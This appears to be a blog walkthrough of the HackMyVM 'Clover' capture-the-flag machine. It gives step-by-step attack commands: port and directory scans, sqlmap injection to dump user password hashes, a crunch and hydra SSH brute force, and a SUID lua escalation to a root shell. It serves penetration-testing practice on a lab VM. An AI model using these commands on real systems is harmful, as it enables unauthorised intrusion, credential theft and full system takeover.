HackMyVm Clover Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Clover


Scan ports.

nmap -sV -sC -p- 192.168.56.99  -oN ports.log

图片.png


Log in ftp anonymous, found 5 text files, but no useful.

图片.png


Scan port 80.

gobuster dir -u http://192.168.56.99 -t 80  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard  -o 80.log

图片.png


Default credentials can not login phpmyadmin. Check /website.

图片.png


Check source code of /website/index.html, found a hint about "ColdFusion".

图片.png


Scan port 80 with dic about coldfusion from seclist.

gobuster dir -u http://192.168.56.99/ -t 50  -w /usr/share/seclists/Discovery/Web-Content/coldfusion.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard  -o coldfusion.log

图片.png


Open login.php, use some common credentials to login, failed. Because we have no other hints about credentials, let's see if it has sql injection.

图片.png


Burpsuite capture the data, and save to post.txt, then use sqlmap to check vulnerability.

sqlmap -r post.txt -p uname,pswd --dbs --batch

图片.png


Then we can dump the password hash of asta.

sqlmap -r post.txt -p uname,pswd  --batch -D clover -T users --dump

图片.png


Decrypt it online, get passwd of asta, then we can login ssh as asta.

图片.png


After a lot enum, we can locate a password hint about another user "sword".

图片.png


Generate passwd lists using crunch, and bruteforce the password of sword.

crunch 12 12 -t P4SsW0rD%%%% >dic.txt 
hydra -l sword -P dic.txt  192.168.56.99 ssh -t 64  -f


After log in as sword, check SUID files.

图片.png


Run deamon.sh, in fact it's lua program.

图片.png


We can get root euid using lua.

./deamon.sh -e 'os.execute("/bin/sh")'

图片.png


Now we can read root flag.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2